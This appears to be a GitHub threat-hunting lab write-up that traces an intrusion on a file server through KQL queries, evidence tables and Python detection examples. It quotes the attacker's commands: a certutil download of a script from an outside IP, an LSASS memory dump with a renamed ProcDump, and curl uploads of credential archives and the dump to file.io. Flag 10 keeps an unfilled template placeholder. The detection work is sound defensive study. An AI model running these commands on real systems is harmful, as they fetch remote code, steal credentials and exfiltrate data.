buggsjr0/Threat-Hunting-Scenario---Cargo_Hold
GitHub: buggsjr0/Threat-Hunting-Scenario---Cargo_Hold
Threat-hunting scenario analysis tool based on KQL queries
Stars: 0 | Forks: 0
**📌 Finding**
"attrib.exe" +h +s C:\Windows\Logs\CBS
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T00:55:43.9986049Z |
| Process | attrib.exe |
| Parent Process | powershell.exe |
| Command Line | `attrib.exe" +h +s C:\Windows\Logs\CBS` |
**💡 Why it matters**
Setting hidden (+h) and system (+s) attributes on directories is a common defense evasion technique used to conceal attacker artifacts from users, administrators, and basic file browsing tools. By hiding a directory under a trusted Windows path (C:\Windows\Logs\CBS), the attacker blends malicious or staging content into locations that are rarely scrutinized.
This behavior strongly maps to MITRE ATT&CK T1564.001 – Hide Artifacts: Hidden Files and Directories. While administrators may occasionally use attrib.exe, its execution from a scripting engine such as PowerShell significantly raises the signal. When observed alongside other discovery or persistence activity, this action often indicates post-compromise cleanup or preparation for longer-term access.
**🔧 KQL Query Used**
DeviceProcessEvents
| where Timestamp between (startofday(datetime(2025-11-22)) .. endofday(datetime(2025-11-22)))
| where DeviceName contains "azuki"
| where ProcessCommandLine has_any ("{", "[", "+", "|")
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName
| order by Timestamp asc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to hunt for attempts to hide files or directories using attribute modification, especially when initiated by scripting engines or non-interactive processes. Prioritize results on servers and shared systems, and look for attribute changes applied to system paths or uncommon directories. Correlate findings with prior discovery, credential access, or persistence activity to identify stealthy post-exploitation behavior.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName == "attrib.exe"
| where ProcessCommandLine has_any("+h", "+s")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend TargetPath = extract(@"([A-Z]:\\[^ ]+)", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, TargetPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #9: COLLECTION - Staging Directory Path
**🎯 Objective**
Attackers establish staging locations to organise tools and stolen data before exfiltration. This directory path is a critical IOC.
**📌 Finding**
C:\Windows\Logs\CBS
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T00:55:43.9986049Z |
| Process | attrib.exe |
| Parent Process | powershell.exe |
| Command Line | "attrib.exe" +h +s C:\Windows\Logs\CBS" |
**💡 Why it matters**
Attackers commonly create staging directories to aggregate tools, scripts, and collected data before exfiltration, reducing noise and improving operational efficiency. Placing a staging directory under a trusted Windows path such as C:\Windows\Logs\CBS helps the activity blend into legitimate system files and evade casual inspection. The prior use of attribute manipulation to hide this directory further reinforces intent to conceal attacker activity rather than normal administrative use. This behavior aligns with MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging, often observed shortly before data exfiltration or lateral movement. When a hidden staging directory is identified on a server, it represents a high-confidence indicator of post-compromise collection activity.
**🔧 KQL Query Used**
DeviceProcessEvents
| where Timestamp between (startofday(datetime(2025-11-22)) .. endofday(datetime(2025-11-22)))
| where DeviceName contains "azuki"
| where ProcessCommandLine has_any ("{", "[", "+", "|")
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName
| order by Timestamp asc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for suspicious directories created or modified within trusted Windows paths that are rarely used for custom data storage. Focus on directories that are hidden, system-marked, or accessed by scripting engines rather than standard Windows services. Correlating directory creation or modification with prior discovery and defense evasion activity can help identify active staging locations before exfiltration occurs.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where FolderPath startswith @"C:\Windows\"
| where ActionType in ("FileCreated", "FolderCreated", "FileModified")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend SuspiciousPath = FolderPath
| project TimeGenerated, DeviceName, AccountName, ActionType, SuspiciousPath, InitiatingProcessCommandLine
| order by TimeGenerated desc
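The hunting tips for these flags repeatedly ask for correlation: a directory only becomes a high-confidence staging location when several distinct stages of the chain (hide, download, copy, archive, upload) touch the same path on the same host within a short window. The following Python is an added example, not code from the repository, that implements that correlation over constructed process events modelled on the scenario's findings. The stage-to-binary mapping, the three-hour window, the three-stage threshold and the placeholder download host 203.0.113.10 are assumptions made for the example; subdirectories count toward their parent so that a copy into `C:\Windows\Logs\CBS\it-admin` is attributed to `C:\Windows\Logs\CBS`.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed DeviceProcessEvents-style records modelled on the scenario's
# findings (hypothetical sample data, not an export from the repository).
# The download host uses a documentation IP (203.0.113.10) as a placeholder.
EVENTS = [
    {"ts": "2025-11-22T00:55:43Z", "device": "azuki-fileserver01", "file": "attrib.exe",
     "cmd": r'"attrib.exe" +h +s C:\Windows\Logs\CBS'},
    {"ts": "2025-11-22T00:56:47Z", "device": "azuki-fileserver01", "file": "certutil.exe",
     "cmd": r'"certutil.exe" -urlcache -f http://203.0.113.10:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1'},
    {"ts": "2025-11-22T01:07:53Z", "device": "azuki-fileserver01", "file": "xcopy.exe",
     "cmd": r'"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y'},
    {"ts": "2025-11-22T01:30:10Z", "device": "azuki-fileserver01", "file": "tar.exe",
     "cmd": r'"tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin .'},
    {"ts": "2025-11-22T01:59:54Z", "device": "azuki-fileserver01", "file": "curl.exe",
     "cmd": r'"curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io'},
    # Benign noise: a build engineer archiving a release on another host.
    {"ts": "2025-11-22T09:00:00Z", "device": "azuki-build02", "file": "xcopy.exe",
     "cmd": r'"xcopy.exe" D:\Builds\v2 E:\Archive\v2 /E /I'},
]

# Which stage of a staging chain each binary represents (assumption for the example).
STAGE_BY_BINARY = {
    "attrib.exe": "hide", "certutil.exe": "download", "xcopy.exe": "copy",
    "robocopy.exe": "copy", "tar.exe": "archive", "7z.exe": "archive",
    "curl.exe": "upload",
}

# A drive-letter path up to the next whitespace or quote.
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"]+")


def directories_in(cmd):
    """Directories referenced by a command line, lower-cased.

    A path whose last component has an extension is reduced to its parent, so
    C:\\Windows\\Logs\\CBS\\credentials.tar.gz and C:\\Windows\\Logs\\CBS count as the same place.
    """
    dirs = set()
    for path in PATH_RE.findall(cmd):
        path = path.rstrip("\\")
        head, _, tail = path.rpartition("\\")
        dirs.add((head if "." in tail else path).lower())
    return dirs


def staging_candidates(events, min_stages=3, window=timedelta(hours=3)):
    """Directories touched by at least `min_stages` distinct chain stages on one
    device within `window` of the first touch. Subdirectories count toward parents."""
    by_device = defaultdict(list)
    for e in events:
        stage = STAGE_BY_BINARY.get(e["file"].lower())
        if stage:
            ts = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
            by_device[e["device"]].append((ts, stage, directories_in(e["cmd"])))

    hits = []
    for device, evs in by_device.items():
        evs.sort(key=lambda ev: ev[0])
        candidates = set().union(*(dirs for _, _, dirs in evs))
        for cand in sorted(candidates):
            touches = [(ts, stage) for ts, stage, dirs in evs
                       if any(d == cand or d.startswith(cand + "\\") for d in dirs)]
            first = touches[0][0]
            stages = {stage for ts, stage in touches if ts - first <= window}
            if len(stages) >= min_stages:
                hits.append({"device": device, "directory": cand,
                             "stages": sorted(stages), "first_seen": first.isoformat()})
    return hits


if __name__ == "__main__":
    for hit in staging_candidates(EVENTS):
        print(hit)
```

On the sample data only `c:\windows\logs\cbs` on azuki-fileserver01 reaches the threshold, with all five stages inside the window; the source share and the build host's copy each show a single stage and are not reported. The same grouping can be expressed in KQL with `extract_all` over the command line and `summarize dcount()` of stages by device and directory, but the Python form makes the subdirectory attribution and the window explicit.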
### 🚩 Flag #10: DEFENSE EVASION - Script Download Command
**🎯 Objective**
Legitimate system utilities with network capabilities are frequently weaponized to download malware while evading detection.
**📌 Finding**
"certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1"
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T00:56:47.4100711Z |
| Process | certutil.exe |
| Parent Process | powershell.exe |
| Command Line | `certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1 C:\Windows\Logs\CBS\ex.ps1` |
**💡 Why it matters**
[Explain the impact, real-world relevance, MITRE mapping, and why this is a high-signal indicator. 4-6 sentences for depth.]
**🔧 KQL Query Used**
DeviceProcessEvents
| where Timestamp between (startofday(datetime(2025-11-22)) .. endofday(datetime(2025-11-22)))
| where DeviceName contains "azuki"
| where InitiatingProcessFileName == "powershell.exe" and InitiatingProcessCommandLine !contains "Windows Defender Advanced Threat Protection"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, FileName
| order by Timestamp asc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus hunting on signed Windows utilities with network functionality (LOLBINs) executing outbound downloads, especially when initiated by scripting engines. Pay close attention to downloads targeting unusual directories such as C:\Windows\Logs\ or user-writable system paths. Correlating certutil usage with prior staging, discovery, or defense evasion activity significantly increases detection fidelity.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName == "certutil.exe"
| where ProcessCommandLine has_any ("-urlcache", "http://", "https://")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| extend DownloadURL = extract(@"(http[s]?://[^\s]+)", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, DownloadURL, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #11: COLLECTION - Credential File Discovery
**🎯 Objective**
Credential files provide keys to the kingdom - enabling lateral movement and privilege escalation across the network.
**📌 Finding**
IT-Admin-Passwords.csv
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T01:07:53.6746323Z |
| Process | xcopy.exe |
| Parent Process | N/A |
| Command Line | `xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y` |
**💡 Why it matters**
Credential files such as spreadsheets or CSVs containing administrative passwords represent some of the highest-value assets an attacker can obtain during an intrusion. By copying an entire IT administrator directory into a hidden staging location, the attacker is clearly preparing credentials for later use, exfiltration, or offline analysis. Possession of valid admin credentials enables rapid lateral movement, privilege escalation, and often full domain compromise without the need for noisy exploitation. This activity maps directly to MITRE ATT&CK T1552.001 – Unsecured Credentials: Credentials in Files, a technique frequently observed in real-world breaches and ransomware operations. File copy utilities like xcopy.exe performing bulk transfers from file shares into concealed directories are a strong, high-signal indicator of credential harvesting rather than legitimate administration.
**🔧 KQL Query Used**
let timeofattack = todatetime('2025-11-22T00:40:29.5749856Z');
DeviceFileEvents
| where TimeGenerated between ((timeofattack - 1h) .. (timeofattack + 1h))
| where DeviceName contains "azuki"
| where InitiatingProcessAccountName != "system"
| where ActionType == "FileCreated"
| project TimeGenerated, ActionType, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for non-system users copying large numbers of files from shared directories—especially IT, Finance, or Admin shares—into uncommon or hidden system paths. Prioritize activity involving archive, copy, or synchronization utilities staging data shortly after discovery or credential access events, as this often precedes exfiltration or lateral movement.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType in ("FileCreated", "FileCopied")
| where InitiatingProcessFileName in ("xcopy.exe", "robocopy.exe", "powershell.exe", "cmd.exe")
// The source share only appears in the copying process's command line;
// FolderPath on a FileCreated event is the destination of the new file.
| where InitiatingProcessCommandLine has_any ("\\FileShares\\", "\\IT", "\\Admin")
| where FolderPath has_any ("\\Windows\\Logs\\", "\\ProgramData\\", "\\Temp")
| where InitiatingProcessAccountName != "SYSTEM"
| project TimeGenerated, DeviceName, AccountName=InitiatingProcessAccountName,
          FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #12: COLLECTION - Recursive Copy Command
**🎯 Objective**
Built-in system utilities are preferred for data staging as they're less likely to trigger security alerts. The exact command line reveals attacker methodology.
**📌 Finding**
"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T01:07:53.6430063Z |
| Process | xcopy.exe |
| Parent Process | powershell.exe |
| Command Line | `"xcopy.exe" C:\FileShares\IT-Admin C:\Windows\Logs\CBS\it-admin /E /I /H /Y` |
**💡 Why it matters**
This activity confirms deliberate and systematic data collection rather than incidental file access. The attacker repeatedly used xcopy.exe to copy multiple high-value enterprise file shares (Contracts, Financial, IT-Admin, Shipping) into a single hidden staging directory, strongly indicating preparation for exfiltration or encryption. The consistency of tooling, destination path, and command-line switches shows hands-on keyboard activity aligned with human-operated intrusion behavior. Staging sensitive business and credential data locally is a common precursor to data theft, ransomware deployment, or double-extortion operations. This behavior maps directly to MITRE ATT&CK T1074.001 – Data Staged: Local Data Staging, with supporting elements of T1119 – Automated Collection, and represents a high-confidence indicator of attacker intent rather than reconnaissance alone.
**🔧 KQL Query Used**
let timeattack = todatetime('2025-11-22T00:40:29.5749856Z');
DeviceProcessEvents
| where TimeGenerated between ((timeattack - 3h) .. (timeattack + 3h))
| where DeviceName contains "azuki"
| where FileName in ("robocopy.exe", "xcopy.exe")
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| order by TimeGenerated asc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus on native file-copy utilities writing multiple distinct source directories into a single destination path within a short time window. Repeated use of xcopy.exe, robocopy.exe, or copy targeting unusual or hidden directories (especially under C:\Windows\) is a strong signal of staging activity and should be prioritized over single copy events.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("xcopy.exe", "robocopy.exe")
| where ProcessCommandLine has_any ("/E", "/I", "/H")
| where ProcessCommandLine contains @"C:\Windows\"
// First drive-letter path on the command line is the copy source.
| extend SourcePath = extract(@"([A-Z]:\\[^ ]+)", 1, ProcessCommandLine)
// Group by device, account and hour, not by ProcessCommandLine: grouping on the
// command line itself would leave one command per group, so DistinctSources could never exceed 1.
| summarize CopyCount = count(),
            DistinctSources = dcount(SourcePath),
            Commands = make_set(ProcessCommandLine),
            FirstSeen = min(TimeGenerated),
            LastSeen = max(TimeGenerated)
    by DeviceName, AccountName, bin(TimeGenerated, 1h)
| where CopyCount >= 2 or DistinctSources >= 2
| order by LastSeen desc
### 🚩 Flag #13: COLLECTION - Compression Command
**🎯 Objective**
Cross-platform compression tools indicate attacker sophistication. The full command line reveals the exact archiving methodology used.
**📌 Finding**
"tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin .
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T01:30:10.0981853Z |
| Process | tar.exe |
| Parent Process | powershell.exe |
| Command Line | `tar.exe" -czf C:\Windows\Logs\CBS\credentials.tar.gz -C C:\Windows\Logs\CBS\it-admin` |
**💡 Why it matters**
The use of tar.exe on a Windows system is a strong indicator of deliberate attacker tradecraft rather than routine administrative activity. Attackers commonly compress staged data to reduce size, preserve directory structure, and prepare files for rapid exfiltration or encryption. In this case, the archive targets a hidden staging directory (C:\Windows\Logs\CBS\it-admin) that already contains harvested credential material, confirming this activity as a late-stage collection step rather than benign maintenance. Compression marks a clear transition from discovery and collection into exfiltration readiness, meaning containment urgency is high. This behavior aligns with MITRE ATT&CK T1560.001 – Archive Collected Data: Archive via Utility, a technique frequently observed immediately prior to data theft or ransomware deployment.
**🔧 KQL Query Used**
let timeattack4 = todatetime('2025-11-22T01:07:53.6430063Z');
DeviceProcessEvents
| where TimeGenerated between ((timeattack4 - 2h) .. (timeattack4 + 2h))
| where DeviceName contains "azuki"
| where FileName in ("tar.exe", "gzip.exe")
| project TimeGenerated, DeviceName, AccountName, ActionType, ProcessCommandLine, InitiatingProcessCommandLine, FolderPath
| order by TimeGenerated desc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query during proactive threat hunts to identify archive creation from suspicious or nonstandard directories (e.g., Windows\Logs, Temp, user-writable system paths). Pay close attention to compression tools executed by scripting engines such as PowerShell, and correlate results with earlier file copy or credential discovery activity to confirm malicious staging behavior.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("tar.exe", "gzip.exe", "7z.exe", "rar.exe")
| where ProcessCommandLine has_any (".zip", ".tar", ".tar.gz", ".7z", ".rar")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #14: CREDENTIAL ACCESS - Renamed Tool
**🎯 Objective**
Renaming credential dumping tools is a basic OPSEC practice to evade signature-based detection.
**📌 Finding**
pd.exe
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:03:19.9845969Z |
| Process | powershell.exe |
| Parent Process | powershell.exe |
| Command Line | `powershell.exe` |
**💡 Why it matters**
Renaming credential dumping tools is a common evasion technique used to bypass signature-based detections that rely on known filenames such as mimikatz.exe. The appearance of an unfamiliar executable (pd.exe) created shortly before credential access activity strongly suggests a renamed or custom-packed dumping utility. Attackers frequently stage these tools under innocuous names to blend into the environment and delay defender response. When combined with prior collection, staging, and compression behavior, this indicates the attacker is actively attempting to harvest credentials for lateral movement or privilege escalation. This activity maps to MITRE ATT&CK T1003 – OS Credential Dumping, with evasion via T1036 – Masquerading, and represents a high-confidence signal of hands-on-keyboard adversary activity.
**🔧 KQL Query Used**
let timeattack4 = todatetime('2025-11-22T01:07:53.6430063Z');
DeviceFileEvents
| where TimeGenerated between ((timeattack4 - 1h) .. (timeattack4 + 1h))
| where DeviceName contains "azuki"
| where ActionType == "FileCreated"
| project TimeGenerated, DeviceName, ActionType, FileName, InitiatingProcessCommandLine, FolderPath
| order by TimeGenerated desc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Use this query to hunt for newly created executables in atypical directories that are shortly followed by credential access, discovery, or compression activity. Prioritize binaries launched by PowerShell or created outside standard install paths, especially on servers and high-value systems. Correlating file creation with suspicious process execution within a short time window significantly increases detection confidence.
DeviceFileEvents
| where TimeGenerated > ago(30d)
| where ActionType == "FileCreated"
| where FileName endswith ".exe"
| where FolderPath has_any ("\\Windows\\Logs\\", "\\Temp\\", "\\ProgramData\\")
| project TimeGenerated,
DeviceName,
FileName,
FolderPath,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #15: CREDENTIAL ACCESS - Memory Dump Command
**🎯 Objective**
The complete process memory dump command line is critical evidence showing exactly how credentials were extracted.
**📌 Finding**
"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp"
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:24:44.3906047Z |
| Process | pd.exe |
| Parent Process | "powershell.exe" |
| Command Line | '"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\lsass.dmp' |
**💡 Why it matters**
Dumping the memory of LSASS (Local Security Authority Subsystem Service) is one of the most reliable indicators of credential theft on Windows systems. LSASS stores sensitive authentication material including plaintext credentials, NTLM hashes, and Kerberos tickets for logged-on users. In this case, the attacker used a renamed credential dumping tool (pd.exe) with explicit memory dump arguments (-ma) to target the LSASS process, confirming intentional credential access rather than accidental or benign behavior. Writing the dump file to a disguised staging directory (C:\Windows\Logs\CBS) further demonstrates attacker OPSEC and an attempt to evade casual inspection. This activity maps directly to MITRE ATT&CK T1003.001 – OS Credential Dumping: LSASS Memory, a high-impact technique frequently used to enable privilege escalation, lateral movement, and full domain compromise. Detection of LSASS dumping should be treated as a containment-critical event.
**🔧 KQL Query Used**
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceProcessEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| where ProcessCommandLine contains "pd.exe"
| project TimeGenerated, DeviceName, ActionType, ProcessCommandLine, FileName, InitiatingProcessCommandLine, FolderPath
| order by TimeGenerated desc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
When hunting for credential dumping, prioritize behavior over tool names. Attackers frequently rename utilities like ProcDump to evade signature-based detections, but LSASS dumping still requires distinctive command-line flags and access patterns. Focus on memory dump arguments (-ma, MiniDump, .dmp) combined with references to LSASS or dump files written to nonstandard directories.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where ProcessCommandLine has_any ("lsass", "-ma", ".dmp")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine,
FolderPath
| order by TimeGenerated desc
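The hunting tip above makes the key point: the tool name is disposable, the dump switch and the target are not. In the scenario the only reason the string "lsass" appears on the command line is the attacker's choice of output filename; had the dump been named `svc.dmp`, only the target PID (876) would still betray the target. The following Python is an added example, not the repository's code, that resolves the dump target against a process snapshot and classifies the command line by behaviour rather than by name. The process table, the set of ProcDump-style switches, the list of expected dump-tool names and the "nonstandard directory" fragments are constructed assumptions for the example.

```python
import re

# Constructed process snapshot (hypothetical): PID -> image name, as an EDR's
# process tree would provide at the time of the event.
PROCESS_TABLE = {4: "System", 876: "lsass.exe", 1320: "svchost.exe", 4410: "notepad.exe"}

# ProcDump-style switches that request a process memory dump (-ma full, -mm mini, -mp, -md).
DUMP_SWITCHES = {"-ma", "-mm", "-mp", "-md"}
# Binary names under which a ProcDump-style dump request is expected (assumption for the example).
KNOWN_DUMP_TOOLS = {"procdump.exe", "procdump64.exe"}
# Directory fragments that make a dump location look nonstandard (assumption for the example).
NONSTANDARD_DUMP_DIRS = ("\\windows\\", "\\programdata\\", "\\temp\\")


def tokenize(cmd):
    """Split a Windows command line on whitespace, keeping quoted arguments intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def parse_dump_request(cmd):
    """Return (exe, target, dump_path) when the command line carries a dump switch
    followed by a target, whatever the executable is called; otherwise None."""
    argv = tokenize(cmd)
    if not argv:
        return None
    exe = argv[0].rsplit("\\", 1)[-1].lower()
    for i, tok in enumerate(argv[1:], start=1):
        if tok.lower() in DUMP_SWITCHES and i + 1 < len(argv):
            target = argv[i + 1]
            dump = next((a for a in argv[i + 2:] if a.lower().endswith(".dmp")), None)
            return exe, target, dump
    return None


def resolve_target(target, process_table):
    """Map a dump target (PID or image name) to an image name, if known."""
    return process_table.get(int(target)) if target.isdigit() else target


def assess(cmd, process_table=PROCESS_TABLE):
    """Classify a command line as 'critical' (LSASS targeted), 'suspicious' or 'info';
    None when it is not a dump request at all."""
    parsed = parse_dump_request(cmd)
    if parsed is None:
        return None
    exe, target, dump = parsed
    image = resolve_target(target, process_table)
    reasons = []
    lsass = bool(image) and image.lower() == "lsass.exe"
    if lsass:
        reasons.append(f"dump target '{target}' resolves to lsass.exe")
    if exe not in KNOWN_DUMP_TOOLS:
        reasons.append(f"dump switch issued by unfamiliar binary '{exe}'")
    if dump and any(frag in dump.lower() for frag in NONSTANDARD_DUMP_DIRS):
        reasons.append(f"dump written to nonstandard location '{dump}'")
    verdict = "critical" if lsass else ("suspicious" if reasons else "info")
    return {"verdict": verdict, "tool": exe, "target_image": image,
            "dump_path": dump, "reasons": reasons}


if __name__ == "__main__":
    # Constructed command lines: the scenario's dump with a renamed output file,
    # a legitimate crash dump of notepad, and a renamed tool naming lsass directly.
    for line in (r'"pd.exe" -accepteula -ma 876 C:\Windows\Logs\CBS\svc.dmp',
                 r'procdump64.exe -accepteula -ma 4410 C:\Users\dev\crash.dmp',
                 r'"dbg.exe" -ma lsass.exe C:\ProgramData\x.dmp'):
        print(assess(line))
```

The first sample is rated critical on the PID alone, the notepad crash dump from the genuine ProcDump binary into a user profile comes back as plain info, and an unknown PID from an unfamiliar binary into `C:\Windows\Temp` lands in between as suspicious. In a hunt the process table would be joined from DeviceProcessEvents (ProcessId and FileName at the time of the dump) rather than hard-coded.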
### 🚩 Flag #16: EXFILTRATION - Upload Command
**🎯 Objective**
Command-line HTTP clients enable scriptable data transfers. The complete command syntax is essential for building detection rules.
**📌 Finding**
curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T01:59:54.2755596Z |
| Process | curl.exe |
| Parent Process | powershell.exe |
| Command Line | curl.exe" -F file=@C:\Windows\Logs\CBS\credentials.tar.gz https://file.io |
**💡 Why it matters**
The use of curl.exe to upload an archive to an external file-sharing service represents a clear data exfiltration action, not preparation or staging. Command-line HTTP clients allow attackers to automate transfers, bypass browser-based controls, and operate quietly through scripts or living-off-the-land binaries. In this case, the attacker exfiltrated a compressed archive (credentials.tar.gz) from a disguised staging directory, confirming that previously collected and compressed credential material was successfully moved off the host. The destination, file.io, is a legitimate but commonly abused public file-sharing service, making this traffic blend into normal outbound HTTPS activity. This behavior aligns with MITRE ATT&CK T1048.003 – Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Channel, and marks a critical point where sensitive data has already left the environment.
**🔧 KQL Query Used**
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceProcessEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| where ProcessCommandLine contains "http"
| project TimeGenerated, DeviceName, ActionType, ProcessCommandLine, FileName, InitiatingProcessCommandLine, FolderPath
| order by TimeGenerated desc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Focus hunts on outbound data transfers initiated by scripting engines or command-line utilities rather than relying solely on destination reputation. File uploads using curl.exe or similar tools (wget, Invoke-WebRequest) combined with archive file extensions and public file-sharing domains are strong indicators of hands-on-keyboard exfiltration activity.
DeviceProcessEvents
| where TimeGenerated > ago(30d)
| where FileName in ("curl.exe", "wget.exe")
| where ProcessCommandLine has_any ("http", "https", "-F", "--upload-file")
| where ProcessCommandLine has_any (".zip", ".tar", ".tar.gz", ".7z", ".rar")
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe")
| project TimeGenerated,
DeviceName,
AccountName,
FileName,
ProcessCommandLine,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #17: EXFILTRATION - Cloud Service
**🎯 Objective**
Cloud file sharing services provide convenient, anonymous exfiltration channels that blend with legitimate business traffic.
**📌 Finding**
file.io
**🔍 Evidence**
| Field | Value |
|------------------|--------------------------------------------|
| Host | azuki-fileserver01 |
| Timestamp | 2025-11-22T02:25:37.9206525Z |
| Process | curl.exe |
| Parent Process | powershell |
| Command Line | "curl.exe" -F file=@C:\Windows\Logs\CBS\lsass.dmp https://file.io |
**💡 Why it matters**
Exfiltrating data to public cloud file-sharing services represents a high-risk data loss scenario because these platforms are widely trusted, encrypted, and commonly allowed through perimeter controls. Attackers favor services like file.io because uploads occur over standard HTTPS, making the traffic difficult to distinguish from legitimate business activity without endpoint context. In this case, the attacker uploaded a full LSASS memory dump, which almost certainly contains cached credentials, NTLM hashes, or Kerberos material. This confirms not just successful credential access, but successful credential theft and removal from the environment, eliminating any opportunity for recovery through containment alone. This behavior aligns with MITRE ATT&CK T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage, and represents a late-stage breach milestone where incident response urgency is critical.
**🔧 KQL Query Used**
let timeattack5 = todatetime('2025-11-22T02:03:19.9845969Z');
DeviceNetworkEvents
| where TimeGenerated between ((timeattack5 - 1h) .. (timeattack5 + 1h))
| where DeviceName contains "azuki"
| project TimeGenerated, DeviceName, RemoteIP, RemoteUrl, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
**🖼️ Screenshot**
**🛠️ Detection Recommendation**
**Hunting Tip:**
Hunt for endpoint-initiated connections to public file-sharing services that originate from scripting engines or command-line tools rather than browsers. Prioritize uploads involving sensitive file types such as memory dumps, archives, or database exports, especially when correlated with prior credential dumping or compression activity.
DeviceNetworkEvents
| where TimeGenerated > ago(30d)
| where RemoteUrl has_any ("file.io", "transfer.sh", "anonfiles", "gofile", "pastebin")
| where InitiatingProcessFileName in ("curl.exe", "powershell.exe", "cmd.exe")
| where InitiatingProcessCommandLine has_any (".dmp", ".zip", ".tar", ".tar.gz", ".7z")
| project TimeGenerated,
DeviceName,
AccountName,
RemoteUrl,
RemoteIP,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by TimeGenerated desc
### 🚩 Flag #18: PERSISTENCE - Registry Value Name
